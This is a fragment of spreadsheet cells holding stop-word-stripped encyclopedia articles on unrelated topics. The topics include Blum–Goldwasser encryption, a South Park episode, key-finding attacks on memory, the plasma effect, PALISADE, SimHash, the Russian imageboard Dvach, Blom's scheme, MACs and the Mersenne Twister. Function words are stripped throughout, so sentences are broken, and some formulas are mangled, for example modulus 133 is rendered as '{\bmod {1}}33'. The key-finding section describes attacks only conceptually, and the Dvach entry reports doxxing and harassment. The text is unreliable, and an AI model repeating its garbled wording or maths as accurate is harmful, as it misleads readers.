d_{q}=((q+1)/4)^{t+1}{\bmod {(q-1)}}} compute {\displaystyle u_{p}=x^{d_{p}}{\bmod {p}}} compute {\displaystyle u_{q}=x^{d_{q}}{\bmod {q}}} using extended euclidean algorithm, compute {\displaystyle r_{p}} {\displaystyle r_{q}} {\displaystyle r_{p}p+r_{q}q=1} compute {\displaystyle x_{0}=u_{q}r_{p}p+u_{p}r_{q}q{\bmod {n}}} this value used encryption (see proof below). {\displaystyle x_{0}} used compute sequence {\displaystyle x_{i}} values used encryption decrypt message, follows. {\displaystyle {\displaystyle compute {\displaystyle x_{i}=x_{i-1}^{2}{\bmod {n}}} compute {\displaystyle p_{i}=} least significant {\displaystyle bits {\displaystyle x_{i}} compute {\displaystyle m_{i}=c_{i}\oplus p_{i}} finally, reassemble values {\displaystyle (m_{1},m_{2},\dots ,m_{t})} message {\displaystyle example {\displaystyle p=19} {\displaystyle q=7} then {\displaystyle n=133} {\displaystyle h=\lfloor log_{2}(log_{2}(133))\rfloor encrypt six-bit message 101001 {\displaystyle 101001_{2}} break 3-bit blocks {\displaystyle m_{1}=101_{2},m_{2}=001_{2}} {\displaystyle t=2} select random {\displaystyle r=36} compute {\displaystyle x_{0}=36^{2}{\bmod {1}}33=99} compute {\displaystyle c_{i}} values follows: 1011100 1010101 {\displaystyle {\begin{aligned}x_{1}&amp;=99^{2}{\bmod {1}}33=92=1011100_{2};\quad p_{1}=100_{2};\quad c_{1}=101_{2}\oplus 100_{2}=001_{2}\\x_{2}&amp;=92^{2}{\bmod {1}}33=85=1010101_{2};\quad p_{2}=101_{2};\quad c_{2}=001_{2}\oplus 101_{2}=100_{2}\\x_{3}&amp;=85^{2}{\bmod {1}}33=43\end{aligned}}} encryption {\displaystyle (c_{1}=001_{2},c_{2}=100_{2},x_{3}=43)} decrypt, compute since {\displaystyle {\begin{aligned}d_{p}&amp;=5^{3}{\bmod {1}}8=17\\d_{q}&amp;=2^{3}{\bmod {6}}=2\\u_{p}&amp;=43^{17}{\bmod {1}}9=4\\u_{q}&amp;=43^{2}{\bmod {7}}=1\\(r_{p},r_{q})&amp;=(3,-8){\text{ since }}3\cdot 19+(-8)\cdot 7=1\\x_{0}&amp;=1\cdot 3\cdot 19+4\cdot (-8)\cdot 7{\bmod {1}}33=99\\\end{aligned}}} seen {\displaystyle x_{0}} value encryption algorithm. decryption therefore proceeds encryption: 1011100 1010101 {\displaystyle {\begin{aligned}x_{1}&amp;=99^{2}{\bmod {1}}33=92=1011100_{2};\quad p_{1}=100_{2};\quad m_{1}=001_{2}\oplus 100_{2}=101_{2}\\x_{2}&amp;=92^{2}{\bmod {1}}33=85=1010101_{2};\quad p_{2}=101_{2};\quad m_{2}=100_{2}\oplus 101_{2}=001_{2}\end{aligned}}} proof correctness must show value {\displaystyle x_{0}} computed step decryption algorithm equal value computed step encryption algorithm. encryption algorithm, construction {\displaystyle x_{0}} quadratic residue modulo {\displaystyle therefore also quadratic residue modulo {\displaystyle {\displaystyle x_{i}} values obtained squaring. therefore, euler's criterion, {\displaystyle x_{i}^{(p-1)/2}\equiv 1\mod {p}} then {\displaystyle x_{t+1}^{(p+1)/4}\equiv (x_{t}^{2})^{(p+1)/4)}\equiv x_{t}^{(p+1)/2}\equiv x_{t}(x_{t}^{(p-1)/2})\equiv x_{t}\mod {p}} similarly, {\displaystyle x_{t}^{(p+1)/4}\equiv x_{t-1}\mod {p}} raising first equation power {\displaystyle (p+1)/4} {\displaystyle x_{t+1}^{((p+1)/4)^{2}}\equiv x_{t}^{(p+1)/4}\equiv x_{t-1}\mod {p}} repeating {\displaystyle times, {\displaystyle x_{t+1}^{(p+1)/4)^{t+1}}\equiv x_{0}\mod {p}} {\displaystyle x_{t+1}^{d_{p}}\equiv u_{p}\equiv x_{0}\mod {p}} similar argument show {\displaystyle x_{t+1}^{d_{q}}\equiv u_{q}\equiv x_{0}\mod {q}} finally, since {\displaystyle r_{p}p+r_{q}q=1} multiply {\displaystyle x_{0}} {\displaystyle x_{0}r_{p}p+x_{0}r_{q}q=x_{0}} {\displaystyle u_{q}r_{p}p+u_{p}r_{q}q\equiv x_{0}} modulo {\displaystyle {\displaystyle therefore {\displaystyle u_{q}r_{p}p+u_{p}r_{q}q\equiv x_{0}\mod {n}} security efficiency blum–goldwasser scheme semantically-secure based hardness predicting keystream bits given final state {\displaystyle public {\displaystyle however, ciphertexts form {\displaystyle {\vec {c}},y} vulnerable adaptive chosen ciphertext attack adversary requests decryption {\displaystyle m^{\prime chosen ciphertext {\displaystyle {\vec {a}},y} decryption {\displaystyle original ciphertext computed {\displaystyle {\vec {a}}\oplus m^{\prime }\oplus {\vec {c}}} depending plaintext size, less computationally expensive rsa. because deployments fixed encryption exponent optimized minimize encryption time, encryption typically outperform shortest messages. however, decryption exponent randomly distributed, modular exponentiation require comparable number squarings/multiplications decryption ciphertext length. advantage scaling efficiently longer ciphertexts, requires multiple separate encryptions. cases, significantly efficient. references blum, goldwasser, efficient probabilistic public encryption scheme hides partial information", proceedings advances cryptology crypto '84, 289–299, springer verlag, 1985. menezes, alfred; oorschot, paul vanstone, scott handbook applied cryptography. press, october 1996. isbn 0-8493-8523-7 external links menezes, oorschot, vanstone, scott: handbook applied cryptography (free downloads), chapter</t>
  </si>
  <si>
    <t>Member Berries</t>
  </si>
  <si>
    <t>"member berries" first episode twentieth season american animated television series south park. 268th episode series overall, premiered comedy central united states september 2016. episode lampooned massive national media coverage colin kaepernick american athletes' protest "the star-spangled banner" presidential campaigns donald trump hillary clinton also commenting nostalgia reboots. plot girls' volleyball match south park gymnasium massively attended townspeople. vast majority many players national anthem protest misogynist internet troll known skankhunt42 school's message boards, randy marsh placed bet. meanwhile, congress decides "the star-spangled banner" needs reboot division caused protests, turns abrams help. randy later assures gallup pollster family vote "turd sandwich instead giant douche" much sharon's annoyance. stressed political climate, stephen stotch recommends eating superfruit called "member berries" relax. member berries, small purple berries utter nostalgic phrases, initially relax randy, shocked berries suddenly start spouting overtly political talking-points heavy conservative bend, reminiscing reagan era, "weren't many mexicans", marriage legal, stops eating them. garrison (giant douche) running mate caitlyn jenner's presidential campaign picks steam, quickly realizes unable carry ludicrous campaign promises. also cannot quit without "looking like jackass", vows continue running ensure victory hillary clinton (turd sandwich) although cannot figure newscaster announces rebooted anthem. garrison decides anthem football game francisco 49ers carolina panthers attended clinton, thwarted fact abrams' reboot simply allows people choose whether sit, stand kneel honor america. kyle broflovski victimized girls strongly suspect eric cartman responsible messages, cannot prove cartman also denies skankhunt42, although help case attempting host girls' stand-up comedy session pretending attacked girls afterward. episode revealed skankhunt42 actually kyle's father, gerald. reception jesse schedeen rated episode classifying "okay". schedeen enjoyed jokes gags episode, felt "many warring subplots failed coalesce satisfying whole". kevin johnson a.v. club rated episode commented enjoyed fact show "has managed consistently find ways reinvent itself, whether leaning harder satirical edge, developing cast deeper, unique ways, improving scale animation, establishing longer story arcs". chris longo geek gave episode stars, noted season already appears "converging conspiracy, show's strength".the episode nominated outstanding animated program 69th primetime emmy awards. references external links "member berries" full episode south park studios "member berries" imdb</t>
  </si>
  <si>
    <t>Key finding attacks</t>
  </si>
  <si>
    <t>finding attacks attacks computer systems make cryptography computer memory non-volatile storage searched private cryptographic keys used decrypt sign data. term generally used context attacks search memory much efficiently simply testing sequence bytes determine provides correct answer. they often used combination cold boot attacks extract material computers. approaches seminal paper finding attacks, shamir someren proposed different approaches finding: statistical entropic finding analytical finding. former relies detecting differences statistical properties data make cryptographic keys later relies determining specific byte patterns must necessarily exist target material looking patterns. statistical finding general cryptographic systems cryptographic keys random possible. symmetric ciphers keys truly random bits. asymmetric ciphers private keys either numbers chosen random certain constraints (such primality generators group) result computations based random numbers constraints. either case material exhibits high entropy. contrast this, uncompressed data computer's memory relatively entropy. result, known exist memory form likely stand background non-key data virtue high entropy attacker needs test matching keys areas memory storage high entropy. contrast entropy data high entropy data sufficient apparent visual inspection. image right shows example this. analytical finding while statistical finding effective reducing amount memory needs searched, still requires high-entropy areas tested check contain correct material. certain cases, particularly context public encryption systems, possible determine patterns must occur material limit search areas patterns found. shamir someren demonstrated example analytical approach finding private keys public known small public exponent. system public pair {\displaystyle (n,e)} {\displaystyle n=p.q} large primes. corresponding private {\displaystyle (n,d)} sometimes {\displaystyle (p,q,d)} variant thereof) {\displaystyle e.d\equiv 1{\pmod {\phi (n)}}} multiplied equivalent modulo {\displaystyle \phi (n)} represents euler's totient function size multiplicative group modulo case key: {\displaystyle \phi (n)=(p-1)(q-1)=n-p-q+1} finding value {\displaystyle \phi (n)} allows factorization security cryptosystem rests difficulty attacker cannot determine exactly, given attack however know fair amount looks like, given knowledge typically chosen length bits 'close' square root thus attacker approximate guess {\displaystyle \phi (n)\approx \phi '(n)=n-2{\sqrt {n}}} typically approximation correct significant half bits binary representation. relationship means that: {\displaystyle d=(1+k.\phi (n))/e} exact value unknown {\displaystyle 0&lt;k&lt;e.} using fact approximation {\displaystyle \phi '(n)} attacker enumerate possible values half binary representation possible value these binary patterns tested many orders magnitude faster performing trail decryption. furthermore, common case {\displaystyle e=3} shown {\displaystyle k=2,} allows half bits determined exactly searched directly. application finding attacks used conjunction cold boot attacks extract keys machines switched off. heninger shacham showed keys extracted even data memory corrupted power removed.statistical finding used nicko someren locate signature verification keys used microsoft validate signatures ms-capi plug-ins. later discovered referred nsakey microsoft, sparking controversy. mitigations finding attacks mitigated several ways. analytic attacks, randomized blinding prevent expected patterns found memory well protecting sorts side-channel attack. statistical attacks made less effective storing sorts high-entropy compressed data memory material spread larger block memory reduce concentration entropy place. references</t>
  </si>
  <si>
    <t>Plasma effect</t>
  </si>
  <si>
    <t>plasma effect computer-based visual effect animated real-time. uses cycles changing colours warped various ways give illusion liquid, organic movement. plasma name graphics demo created bret mulvey 1988 released compuserve. used diamond-square algorithm generate pattern, cycled colors using vga's hardware palette 256-color mode. plasma picked demo coders demos effect heavily used, especially early 1990s. effect particularly common commodore amiga could implemented efficiently display hardware features. plasma also implemented easily software rendering using sinus tables pseudocolor palettes, also first true demo effect many beginning democoders. fractal software fractint also incorporates algorithm known "plasma", which, combined color cycling feature software, provide result resembles typical plasma effect used demos. technical basis, however, completely different, color cycling plasma somewhat less dynamic demo plasma. similar effects easily implemented modern gpus pixel shaders. synopsis many "hacked" approaches implementing plasma effect, outline algorithm describe theoretical basis effect. order achieve sufficiently fast good-looking real-time implementation (especially limited hardware available time effect height popularity 1990s), would often "non-correct" approximations algorithm. this, however, often done without noticeable visual differences. this algorithm given dimensions, could easily adopted number dimensions number color channels. {\displaystyle f(x,y)} multi-frequency noise function variables (e.g., perlin noise function). color component {\displaystyle pixel {\displaystyle (x,y)} linear function expression freq {\displaystyle \sin(f(x,y)*{\text{freq}}_{c})} increasing value constant freq {\displaystyle {\text{freq}}_{c}} tends increase steepness color gradients image. also diamond-square algorithm fractal used original plasma demo, often called plasma fractal name given fractint. external links page explaining effect built including javascript animation</t>
  </si>
  <si>
    <t>PALISADE (software)</t>
  </si>
  <si>
    <t>palisade open-source cross platform software library provides implementations lattice cryptography building blocks homomorphic encryption schemes. history palisade adopted open modular design principles predecessor sipher software library darpa proceed program. sipher development began 2010, focus modular open design principles support rapid application deployment multiple schemes hardware accelerator back-ends, including mobile, fpga cpu-based computing systems. palisade began building earlier sipher designs 2014, open-source release 2017 substantial improvements every subsequent months. palisade development funded originally darpa proceed safeware programs, subsequent improvements funded additional darpa programs, iarpa, nsa, nih, onr, united states navy, sloan foundation commercial entities duality technologies. palisade subsequently used commercial offerings, duality technologies raised funding seed round later series round intel capital. features palisade includes following features: post-quantum public-key encryption fully homomorphic encryption (fhe) brakerski/fan-vercauteren (bfv) scheme integer arithmetic optimizations brakerski-gentry-vaikuntanathan (bgv) scheme integer arithmetic optimizations cheon-kim-kim-song (ckks) scheme real-number arithmetic optimizations ducas-micciancio (fhew) scheme boolean circuit evaluation optimizations chillotti-gama-georgieva-izabachene (tfhe) scheme boolean circuit evaluation extensions multiparty extensions threshold bgv, bfv, ckks schemes proxy re-encryption bgv, bfv, ckks schemes digital signature identity-based encryption ciphertext-policy attribute-based encryption availability there several known repositories/ports palisade: palisade stable release (official stable release repository) palisade preview release (official development/preview release repository) palisade digital signature extensions palisade attribute-based encryption extensions (includes identity-based encryption ciphertext-policy attribute-based encryption) javascript webassembly palisade webassembly (official webassembly port) python python demos (official python demos) freebsd palisade (freebsd port) references</t>
  </si>
  <si>
    <t>SimHash</t>
  </si>
  <si>
    <t>computer science, simhash technique quickly estimating similar sets are. algorithm used google crawler find near duplicate pages. created moses charikar. 2021 google announced intent also algorithm newly created floc (federated learning cohorts) system. evaluation benchmarks large scale evaluation conducted google 2006 compare performance minhash simhash algorithms. 2007 google reported using simhash duplicate detection crawling using minhash google news personalization. also minhash w-shingling count–min sketch references external links simhash princeton paper simhash explained comparison minhash simhash</t>
  </si>
  <si>
    <t>R2D2 (trojan)</t>
  </si>
  <si>
    <t>Dvach</t>
  </si>
  <si>
    <t>dvach (russian: двач, "two" "chan"), also known 2ch, largest russian anonymous imageboard. originally began 2006 shut 2009. succeeded many copies, became popular original. currently known 2ch.hk nariman namazov, nicknamed abu. after major ddos-attack 2016, hosted state-affiliated company, mail.ru group, leading many users believe sold company undisclosed sum.many users avoid using name dvach 2ch.hk, believe name appropriate original imageboard. they various derogatory names instead, kharkach (from харкать (harkat'), spit", referencing domain), sosach (from сосать (sosat), suck", previous domain name 2ch.so), mailach (from alleged connections mail.ru group), abuchan (from abu) refer newer site. dvach often accused cyberbullying, misogyny, toxic trolling, also doxxed criminals. history original dvach "old dvach", 2ch.ru, launched february 2006 vikentiy fesunov allegedly administered konstantin grusha, also co-owned several russian websites like bash.im anime.ru. userbase mostly anime fans, influenced 4chan, 2channel, russian communities popular time, especially livejournal bloggers. 2ch.ru first russian-language imageboard. later 2007, websites created, including iichan, heavily moderated imageboard "polite non-toxic" alternative dvach, now-defunct 0chan, imageboard tech geeks, later developed refuge dvach users. january 2009, 2ch.ru closed. domain name still owned fesunov nobody would claim some users went 0chan, numerous copies dvach also launched, notable 2-ch.ru, known tirech (from тире, transl. "dash"), vitalik moderation team. change administration november 2010, vitalik resigned administrator, user named succeeded him. later revealed interview former classmate, russian youtube blogger ilya varlamov, bought 2-ch 10,000 dollars. tolerated derogatory mocking names given board users, like macaque sosach. used images disney's aladdin.abu changed moderation team banned former moderators abuse tripcodes avatars. also repressed many in-site user communities, rozen maiden little pony fans, child porn posters, anime fans posting outside board. unlike previous owners copy-cats, tried preserve original image dvach, introduced many innovations. welcoming message changed добро пожаловать. снова. (transl. welcome. again.), becoming informal slogan 2ch.hk. site used makaba, custom version widespread wakaba engine. criticized users promoting imageboard social networks like twitter when board advertised mdk, largest communities, thread discussing fact deleted abu, became moderator community. also introduced subscriptions site, "passcodes", allow users bought avoid captchas attach eight images posts instead default four.in 2011, doxxed. identity revealed nariman namazov (russian: нариман намазов), 27-year-old azerbaijani specialist moscow. initially, tried ridicule dismiss revealing, confirmed 2013. since then, officially represented 2ch.hk media, address users annual year speeches. alleged mail.ru deal september 2016, alleged ddos attacks 2ch.hk, mail.ru group, state-affiliated company owned popular e-mail service provided services defend website. widely believed 2ch.hk sold company, criticized users. speculated deal raised concerns disclosure user data anonymity principle violations. many users left website, large part migrated lolifox, brazilian imageboard, later abandoned original users completely taken russians. subculture slang many dvach terms become widespread russian internet slang, (tyan, "girl") (kun, "guy"), derived japanese honorifics, всратый (vsratyi, "ugly", literally "shitted up"), expressions like задавайте свои ответы (transl. "ask answers" instead "ask questions").many newcomers tend overuse outdated local slang, imagine appropriate. many terms borrowed west. some undergone russification, like semyon (influenced russian proper name, english "same person", poster pretends several different people discussion) sazha (literally "soot", sage, japanese term replying thread without bumping it). sometimes serves introduction western memes enter russian internet.the default software used dvach makaba, fork wakaba engine. officially, underage people allowed site. there boards, explicitly related sex. user found underage, banned boards. porn, real-life drawn, generally tolerated posted freely boards, except child pornography zoophilia, forbidden russian law. despite child porn forbidden, girls previously involved child porn, masha babko liinaliiis, became memes 2ch. political stance there generally common political stance among website users. some like politics all, fiery political discussions outside /po/ similar boards result bans participants. nevertheless, dvach shares large part audience many alt-right forums, plum community uebermarginal twitch streamer, well prominent libertarian activists like mikhail svetov. many widespread political memes originated 2ch.hk. users like vladimir putin call pynya, supporters call opponent, alexei navalny, sisyan (literally "tittied", referencing photo navalny overweight manboobs).in october 2018, dvach users disclosed true identity suspects allegedly involved poisoning sergei yulia skripal british subjects salisbury. they emailed several bellingcat investigators provided public photos showing real name board honorably awarded military serviceman participation public events russian eastern high general military command academy.namazov said "left-leaning". ethnic azerbaijani, support russian nationalists. described navalny, associated nationalists past, populist, actively promoted sisyan meme denigrating navalny. some users namazov cooperates tightly russian police special services, revealing data users promote mass protests advocate extremist organisations. controversies pranks after incidents like terrorist attacks mass shootings, dvach users prank people social networks fake eulogies, featuring site owner nariman namazov former porn star sasha grey victims perpetrators, akin hyde accused perpetrator various shootings users 4chan.in 2015, sasha grey reacted denied rumor murdered donbass.in january 2019, novaya gazeta reported according sources, perpetrator 2018 magnitogorsk explosion "norimonov namazjon wakabliyevich", later refuting information. offline events september 2017, dvach user placed large poster sisyan meme railway bridge navalny demonstration novosibirsk.in november 2018, three activists installed putin doll inscription "war criminal pynya v.v." perm. arrested. blocking attempts august 2015, ("naked girls") board blocked russia alleged posts child pornography.in 2017, dvach blocked ukraine, along services hosted mail.ru group.in november 2019, russian internet regulators demanded dvach delete posts degrading state symbols, threatened site blocking.dvach's official twitter account blocked march 2020. representatives said copyright infringement account, users speculated related conflict russian feminist activists.in march 2020, dvach temporarily blocked covid-19 misinformation. hacking cases back 2011, dvach users accused ddos attacks opposition websites.after kerch polytechnic college massacre, perpetrator's (vladislav roslyakov) accounts hacked direct messages posted dvach. gained fans site.in july 2019, hackers stole data sytech company, contractor. they also defaced company's website yoba meme.in october 2019, dvach user hacked nato rapid deployable corps italy website. replaced info corps commander derisive biography namazov. placed link 2ch.hk accompanied yoba meme. doxxing pornstars dvach often criticized attitude towards women. april 2016, dvach users doxxed russian porn actresses, outing friends families. they used findface, face recognition service searched photos uploaded vk.in early 2020, dvach users doxxed russian women participated porn-horror video till lindemann, rammstein vocalist. users criticized "degrading image russian women". russian feminist activist zalina marshenkulova, stood women, accused dvach users death threats cyberbullying her. attacking celebrities users site often attack russian celebrities. october 2019, russian comedian garik kharlamov deemed "cuckold" wife kristina asmus filmed erotic scene text. couple later divorced, said related dvach trolling.in march 2020, host andrey malakhov called "the chief scavenger" official twitter hyping tragedies deadly incidents. finding criminals october 2016, dvach doxxed teenage girls khabarovsk bragged torturing animals offending homeless people social networks. they prison sentences.in february 2019, users doxxed child porn studio kyiv, ukraine, officials arrested organizers.in february 2020, user posted photos hospital, claiming male nurse, said "loves disabling ventilators watching agony dying (world veterans", saying already killed people. sergey kalinin, perm apologized said prank actually kill anyone; fired hospital. also 2channel futaba channel 4chan 8chan ilbe storehouse references</t>
  </si>
  <si>
    <t>Blom's scheme</t>
  </si>
  <si>
    <t>blom's scheme symmetric threshold exchange protocol cryptography. scheme proposed swedish cryptographer rolf blom series articles early 1980s.a trusted party gives participant secret public identifier, enables participants independently create shared communicating. however, attacker compromise keys least users, break scheme reconstruct every shared key. blom's scheme form threshold secret sharing. blom's scheme currently used hdcp (version only) copy protection scheme generate shared keys high-definition content sources receivers, players high-definition televisions. protocol exchange protocol involves trusted party (trent) group {\displaystyle \scriptstyle users. alice users group. protocol setup trent chooses random secret symmetric matrix {\displaystyle \scriptstyle d_{k,k}} finite field {\displaystyle \scriptstyle gf(p)} prime number. {\displaystyle \scriptstyle required user added sharing group. example: {\displaystyle {\begin{aligned}k&amp;=3\\p&amp;=17\\d&amp;={\begin{pmatrix}1&amp;6&amp;2\\6&amp;3&amp;8\\2&amp;8&amp;2\end{pmatrix}}\ \mathrm {mod} 17\end{aligned}}} inserting participant users alice want join exchanging group. trent chooses public identifiers them; i.e., k-element vectors: {\displaystyle i_{\mathrm {alice} },i_{\mathrm {bob} }\in gf^{k}(p)} example: {\displaystyle i_{\mathrm {alice} }={\begin{pmatrix}1\\2\\3\end{pmatrix}},i_{\mathrm {bob} }={\begin{pmatrix}5\\3\\1\end{pmatrix}}} trent computes private keys: {\displaystyle {\begin{aligned}g_{\mathrm {alice} }&amp;=di_{\mathrm {alice} }\\g_{\mathrm {bob} }&amp;=di_{\mathrm {bob} }\end{aligned}}} using {\displaystyle described above: {\displaystyle {\begin{aligned}g_{\mathrm {alice} }&amp;={\begin{pmatrix}1&amp;6&amp;2\\6&amp;3&amp;8\\2&amp;8&amp;2\end{pmatrix}}{\begin{pmatrix}1\\2\\3\end{pmatrix}}={\begin{pmatrix}19\\36\\24\end{pmatrix}}\ \mathrm {mod} 17={\begin{pmatrix}2\\2\\7\end{pmatrix}}\ \\g_{\mathrm {bob} }&amp;={\begin{pmatrix}1&amp;6&amp;2\\6&amp;3&amp;8\\2&amp;8&amp;2\end{pmatrix}}{\begin{pmatrix}5\\3\\1\end{pmatrix}}={\begin{pmatrix}25\\47\\36\end{pmatrix}}\ \mathrm {mod} 17={\begin{pmatrix}8\\13\\2\end{pmatrix}}\ \end{aligned}}} each private compute shared keys participants group. computing shared alice alice wish communicate another. alice bob's identifier {\displaystyle \scriptstyle i_{\mathrm {bob} private {\displaystyle \scriptstyle g_{\mathrm {alice} computes shared {\displaystyle \scriptstyle k_{\mathrm {alice/bob} }=g_{\mathrm {alice} }^{t}i_{\mathrm {bob} {\displaystyle \scriptstyle denotes matrix transpose. same, using private identifier, giving result: {\displaystyle k_{\mathrm {alice/bob} }=k_{\mathrm {alice/bob} }^{t}=(g_{\mathrm {alice} }^{t}i_{\mathrm {bob} })^{t}=(i_{\mathrm {alice} }^{t}d^{t}i_{\mathrm {bob} })^{t}=i_{\mathrm {bob} }^{t}di_{\mathrm {alice} }=k_{\mathrm {bob/alice} they generate shared follows: {\displaystyle {\begin{aligned}k_{\mathrm {alice/bob} }&amp;={\begin{pmatrix}2\\2\\7\end{pmatrix}}^{t}{\begin{pmatrix}5\\3\\1\end{pmatrix}}=2\times 5+2\times 3+7\times 1=23\ \mathrm {mod} 17=6\\k_{\mathrm {bob/alice} }&amp;={\begin{pmatrix}8\\13\\2\end{pmatrix}}^{t}{\begin{pmatrix}1\\2\\3\end{pmatrix}}=8\times 1+13\times 2+2\times 3=40\ \mathrm {mod} 17=6\end{aligned}}} attack resistance order ensure least keys must compromised every shared computed attacker, identifiers must k-linearly independent: sets randomly selected user identifiers must linearly independent. otherwise, group malicious users compute member whose identifier linearly dependent theirs. ensure property, identifiers shall preferably chosen mds-code matrix (maximum distance separable error correction code matrix). rows mds-matrix would identifiers users. mds-code matrix chosen practice using code-matrix reed–solomon error correction code (this error correction code requires easily understandable mathematics computed extremely quickly). references</t>
  </si>
  <si>
    <t>Plaintext-aware encryption</t>
  </si>
  <si>
    <t>plaintext-awareness notion security public-key encryption. cryptosystem plaintext-aware difficult efficient algorithm come valid ciphertext without aware corresponding plaintext. from point view, strange property. normally, ciphertext computed encrypting plaintext. ciphertext created way, creator would aware, sense, plaintext. however, many cryptosystems plaintext-aware. example, consider cryptosystem without padding. cryptosystem, plaintexts ciphertexts values modulo (the modulus). therefore, plaintext aware: generating ciphertext without knowing plaintext simply choose random number modulo fact, plaintext-awareness strong property. cryptosystem semantically secure plaintext-aware actually secure chosen-ciphertext attack, since adversary chooses ciphertexts would already know plaintexts associated them. history concept plaintext-aware encryption developed mihir bellare phillip rogaway paper optimal asymmetric encryption, method prove cryptosystem chosen-ciphertext secure. further research limited research plaintext-aware encryption done since bellare rogaway's paper. although several papers applied plaintext-aware technique proving encryption schemes chosen-ciphertext secure, three papers revisit concept plaintext-aware encryption itself, focussed definition given bellare rogaway inherently require random oracles. plaintext-aware encryption known exist public-key infrastructure assumed. also, shown weaker forms plaintext-awareness exist knowledge exponent assumption, non-standard assumption diffie-hellman triples. finally variant cramer shoup encryption scheme shown fully plaintext aware standard model knowledge exponent assumption. also topics cryptography references</t>
  </si>
  <si>
    <t>Message authentication code</t>
  </si>
  <si>
    <t>cryptography, message authentication code (mac), sometimes known tag, short piece information used authenticating message. words, confirm message came stated sender (its authenticity) changed. value protects message's data integrity, well authenticity, allowing verifiers (who also possess secret key) detect changes message content. terminology term message integrity code (mic) frequently substituted term mac, especially communications distinguish latter media access control address (mac address). however, authors refer message digest, aims uniquely opaquely identify single message. 4949 recommends avoiding term message integrity code (mic), instead using checksum, error detection code, hash, keyed hash, message authentication code, protected checksum. definitions informally, message authentication code system consists three algorithms: generation algorithm selects space uniformly random. signing algorithm efficiently returns given message. verifying algorithm efficiently verifies authenticity message given tag. that return accepted message tampered forged, otherwise return rejected.a secure message authentication code must resist attempts adversary forge tags, arbitrary, select, messages, including conditions known- chosen-message. computationally infeasible compute valid given message without knowledge key, even worst case, assume adversary knows message question.formally, message authentication code (mac) system triple efficient algorithms satisfying: (key-generator) gives input security parameter. (signing) outputs input string (verifying) outputs accepted rejected inputs: string must satisfy following: g(1n), s(k, accepted unforgeable every efficient adversary g(1n), as(k, )(1n), query(as(k, 1n), v(k, accepted] negl(n),where as(k, denotes access oracle s(k, query(as(k, denotes queries made knows clearly require adversary cannot directly query string since otherwise valid easily obtained adversary. security while functions similar cryptographic hash functions, possess different security requirements. considered secure, function must resist existential forgery chosen-message attacks. this means even attacker access oracle possesses secret generates macs messages attacker's choosing, attacker cannot guess messages (which used query oracle) without performing infeasible amounts computation. macs differ digital signatures values generated verified using secret key. this implies sender receiver message must agree initiating communications, case symmetric encryption. reason, macs provide property non-repudiation offered signatures specifically case network-wide shared secret key: user verify also capable generating macs messages. contrast, digital signature generated using private pair, public-key cryptography. since private accessible holder, digital signature proves document signed none holder. thus, digital signatures offer non-repudiation. however, non-repudiation provided systems securely bind usage information key; possession people, copy used generation copy hardware security module permits verification. this commonly done finance industry. implementation algorithms constructed cryptographic primitives, like cryptographic hash functions case hmac) block cipher algorithms (omac, ccm, gcm, pmac). however many fastest algorithms like umac-vmac poly1305-aes constructed based universal hashing.intrinsically keyed hash algorithms siphash also definition macs; even faster universal-hashing based macs.additionally, algorithm deliberately combine cryptographic primitives, maintain protection even later found vulnerable. instance, transport layer security (tls), input data split halves processed different hashing primitive (sha-1 sha-2) xored together output mac. one-time universal hashing particular pairwise independent hash functions provide secure message authentication code long used once. this seen one-time authentication.the simplest pairwise independent hash function defined random key, message computed prime. more generally, k-independent hashing functions provide secure message authentication code long used less times k-ways independent hashing functions. message authentication codes data origin authentication also discussed framework quantum cryptography. contrast cryptographic tasks, distribution, rather broad class quantum macs shown quantum resources offer advantage unconditionally secure one-time classical macs. standards various standards exist define algorithms. these include: fips computer data authentication, withdrawn 2002, defines algorithm based des. fips 198-1 keyed-hash message authentication code (hmac) nist sp800-185 sha-3 derived functions: cshake, kmac, tuplehash, parallelhash iso/iec 9797-1 mechanisms using block cipher iso/iec 9797-2 mechanisms using dedicated hash-function iso/iec 9797-3 mechanisms using universal hash-function iso/iec 29192-6 lightweight cryptography message authentication codesiso/iec 9797-1 define generic models algorithms used block cipher hash function, variety different parameters. these models parameters allow specific algorithms defined nominating parameters. example, fips algorithm functionally equivalent iso/iec 9797-1 algorithm padding method block cipher algorithm des. example example, sender message runs algorithm produce data tag. message sent receiver. receiver turn runs message portion transmission algorithm using key, producing second data tag. receiver compares first received transmission second generated tag. identical, receiver safely assume message altered tampered transmission (data integrity). however, allow receiver able detect replay attacks, message must contain data assures message sent (e.g. time stamp, sequence number one-time mac). otherwise attacker could without even understanding content record message play back later time, producing result original sender. also checksum cmac hmac (hash-based message authentication code) mmh-badger poly1305 authenticated encryption umac vmac siphash kmac notes references goldreich, oded (2001), foundations cryptography basic tools, cambridge: cambridge university press, isbn 978-0-511-54689-1 goldreich, oded (2004), foundations cryptography basic applications publ. ed.), cambridge [u.a.]: cambridge univ. press, isbn 978-0-521-83084-3 pass, rafael, course cryptography (pdf), retrieved december 2015 external links laboratories entry macs rivest lecture macs</t>
  </si>
  <si>
    <t>Mersenne Twister</t>
  </si>
  <si>
    <t>mersenne twister general-purpose pseudorandom number generator (prng) developed 1997 makoto matsumoto takuji nishimura 拓士). name derives fact period length chosen mersenne prime. mersenne twister designed specifically rectify flaws found older prngs. commonly used version mersenne twister algorithm based mersenne prime 19937 {\displaystyle 2^{19937}-1} standard implementation that, mt19937, uses 32-bit word length. there another implementation (with five variants) uses 64-bit word length, mt19937-64; generates different sequence. application software mersenne twister used default prng following software: programming languages: dyalog apl, idl, ruby, free pascal, php, python (also available numpy, however default changed pcg64 instead version 1.17),, common lisp, embeddable common lisp, steel bank common lisp, julia julia lts, still available later, better/faster used default 1.7). linux libraries software: glib, multiple precision arithmetic library, octave, scientific library. other: microsoft excel, gauss, gretl, stata. sagemath, scilab, maple, matlab.it also available apache commons, standard library (since c++11), mathematica. add-on implementations provided many program libraries, including boost libraries, cuda library, numerical library.the mersenne twister prngs spss: generator kept compatibility older programs, mersenne twister stated "more reliable". mersenne twister similarly prngs sas: generators older deprecated. mersenne twister default prng stata, kiss, compatibility older versions stata. advantages permissively-licensed patent-free variants except cryptmt. passes numerous tests statistical randomness, including diehard tests most, testu01 tests. long period 19937 {\displaystyle 2^{19937}-1} note long period guarantee quality random number generator, short periods, {\displaystyle 2^{32}} common many older software packages, problematic. k-distributed 32-bit accuracy every {\displaystyle 1\leq k\leq 623} (for definition k-distributed, below) implementations generally create random numbers faster hardware-implemented methods. study found mersenne twister creates 64-bit floating point random numbers approximately twenty times faster hardware-implemented, processor-based rdrand instruction set. disadvantages relatively large state buffer, kib, unless tinymt variant (discussed below) used. mediocre throughput modern standards, unless sfmt variant (discussed below) used. exhibits clear failures (linear complexity) crush bigcrush testu01 suite. test, like 